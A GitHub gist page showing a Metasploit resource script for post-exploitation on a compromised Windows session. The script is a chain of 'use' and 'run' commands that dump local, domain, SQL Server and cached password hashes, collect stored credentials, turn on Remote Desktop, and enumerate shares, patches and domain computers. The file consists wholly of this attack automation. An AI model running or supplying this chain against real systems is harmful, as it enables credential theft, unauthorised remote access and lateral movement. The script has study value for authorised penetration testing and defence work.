Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save 1N3/7b852bb24e87ee6f7389 to your computer and use it in GitHub Desktop.
Save 1N3/7b852bb24e87ee6f7389 to your computer and use it in GitHub Desktop.

Revisions

  1. 1N3 created this gist Feb 3, 2016.
    29 changes: 29 additions & 0 deletions metasploit-post-exploitation-script-for-windows.rc
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,29 @@
    setg SESSION 1
    use post/windows/gather/smart_hashdump
    run
    use post/windows/gather/credentials/domain_hashdump
    run
    use post/windows/gather/credentials/mcafee_vse_hashdump
    run
    use post/windows/gather/credentials/mssql_local_hashdump
    run
    use post/windows/gather/hashdump
    run
    use post/windows/gather/enum_shares
    run
    use post/windows/gather/enum_patches
    run
    use post/windows/gather/credentials/domain_hashdump
    run
    use post/windows/manage/enable_rdp
    run
    use post/windows/gather/enum_domain
    run
    use post/windows/gather/credentials/credential_collector
    run
    use post/windows/gather/enum_computers
    run
    use post/windows/gather/cachedump
    run
    use post/windows/gather/enum_ad_computers
    run